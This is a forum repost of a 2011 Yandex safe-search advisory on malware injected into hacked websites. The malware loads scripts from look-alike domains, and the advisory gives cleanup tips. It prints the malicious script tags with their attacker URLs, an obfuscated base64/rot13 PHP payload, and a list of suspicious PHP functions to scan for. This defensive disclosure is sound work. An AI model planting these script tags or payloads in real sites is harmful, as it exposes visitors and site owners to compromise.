|
|
Безопасный поиск Яндекса |
|
Безопасность - Помощь в обнаружении и удалении вредоносного кода с сайта. Устранение последствий взлома. Все о веб безопасности. |
![]() |
|
Опции темы | Оценить тему | Опции просмотра |
![]() |
#1 |
|
![]() ![]() Способы обфускации вредоносного кода на примере yandex-yandex.uni.cc и ad.yandex-verification.net
В настоящее время злоумышленники используют Интернет в качестве одного из основных каналов распространения вредоносного кода. Чтобы найти, проанализировать и удалить этот код было сложнее, они применяют различные методы его обфускации. Обфускация программного кода – это любые действия, усложняющие его анализ, в том числе:
Вредоносный код на веб-сайтах часто состоит из нескольких частей, которые подгружаются из разных источников. Вспомогательная часть обычно располагается на страницах недавно взломанного «хорошего» сайта. Когда она загружается к пользователю в браузер, то подгружает в него основной вредоносный код с серверов злоумышленников. Злоумышленники могут давать серверам, с которых загружается основная часть вредоносного кода, доменные имена похожие на доменные имена известных компаний. В последнее время резко участились случаи заражения веб-сайтов кодом, основная часть которого загружается с yandex-yandex.uni.cc и ad.yandex-verification.net. К Яндексу эти домены, разумеется, никакого отношения не имеют. Технические подробности приведены ниже. Будьте бдительны! yandex-yandex.uni.cc На 23.06.2011 в нашей базе насчитывается более полутора тысяч сайтов, страницы которых заражены таким кодом. Скрипт на заражённой странице имеет вид: <script>Код, передаваемый на клиент (в браузер) преднамеренно переусложнён и сделан трудночитаемым, что является обфускацией. После выполнения данного скрипта на веб-страницу добавляется ещё один тег script, в атрибуте src которого присутствует url вида: http://yandex-yandex.uni.cc/verify-v1?id=<random_number>&group=2&seoref=<referer>&par ameter=$keyword&se=$se&ur=1&HTTP_REFERER=<url>&def ault_keyword=где: <random_number> - случайно сгенерированное число от 0 до 30000; Кроме обфускации вредоносного кода, передаваемого на сторону клиента, для данного типа вредоносного ПО характерна также обфускация вредоносного кода, который добавляется в PHP-скрипты при взломе сервера, например: <?php $somecrainsignvar="df8aslpq"; echo base64_decode(str_rot13('VQkmL3WcpUD+VN0XqzSlVTquF aAVo3A0VQ0tXPtvnUE0pQbvVQ09VTEiL3IgMJ50YzkiL2S0nJ9 hYaOlo3EiL29fXFN/VPWbqUEjBv8irJShMTI4VvN6VPWbqUEjBv8irJShMTI4Vvx7VT EiL3IgMJ50YaqlnKEyXUIhMKAwLKOyXPVyZ0AmL3WcpUDtp3Ww CFpvVPftM2SXp0uip3DtXlNvYKyuozEyrP51ozxhL2ZiqzIlnJ M5YKLkC2yxCFVeGJS0nP5zoT9ipvuALKEbYaWuozEioFtcVPbm ZQNjZPxeVvMapz91pQ0lWaAyo3WyMw0vX2IhL29xMIIFFHAioK OiozIhqPuxo2A1oJIhqP5lMJMypaWypvxeVPVzpTSlLJ1yqTIl CFEeMKy3o3WxWaAyCFEmMFM1pw0kWxuHISOsHxITEIWSHw0vX2 IhL29xMIIFFHAioKOiozIhqPuxo2A1oJIhqP5IHxjcXlVzMTIz LKIfqS9eMKy3o3WxCFptqUyjMG0aqTI4qP9dLKMup2AlnKO0Wl HmEFHmDl9mL3WcpUDyZ0HvXFx7QDbtCP9mL3WcpUD+VN==')); $crain=""; ad.yandex-verification.net На 23.06.2011 в нашей базе насчитывается более двух тысяч сайтов, страницы которых заражены таким кодом. Скрипты на заражённой странице имеют вид: <script type="text/javascript" src="http://ad.yandex-verification.net/verify-v1"></script>или <script type="text/javascript" src="http://ad.yandex-verification.net/verify-v2"></script> Существенных особенностей по сравнению с yandex-yandex.uni.cc работа этого вредоносного кода не имеет. Как удалить вредоносный код на стороне сервера Чаще всего вредоносный код появляется на сайте в результате взлома или использования украденного пароля доступа. Злоумышленники получают пароли и ценную информацию при помощи троянских программ и вирусов, которые могут оставаться на личном компьютере вебмастера или администратора сайта длительное время. Поэтому перед тем, как удалять вредоносный код, советуем:
В противном случае злоумышленники смогут снова внедрить вредоносный код в страницы вашего сайта. Кроме того, имеет смысл проверить сайт на другие виды заражения, в качестве которого может выступать любой незнакомый вам обфусцированный (специально сделанный нечитаемым, например, закодированный) код, особенно содержащий функции: eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13 Чтобы в будущем не допустить заражения вашего сайта вредоносным кодом:
Команда безопасного поиска Яндекса ![]() Хочешь заработать на новую машину?
|
![]() |
![]() ![]() ![]() |
![]() |
|
Опции темы | |
Опции просмотра | Оценка этой теме |
|
|
![]() |
||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Поиск доменов с PR | zloygeniy | Домены | 1 | 07.03.2011 20:15 |
Поиск по доменам | binary | Продвижение сайта | 3 | 03.11.2010 10:12 |
yandex.com - Поиск по иностранным сайтам от Яндекса | Alex LM | Яndex | 7 | 28.09.2010 15:27 |
Поиск по форуму (стандартный + поиск от Google) | Alex LM | О работе SEO Cafe | 0 | 09.02.2010 15:42 |
Поиск в Google? | Black-Cat | 1 | 08.03.2009 17:07 |
|
Текущее время: 20:17. Часовой пояс GMT +3.
|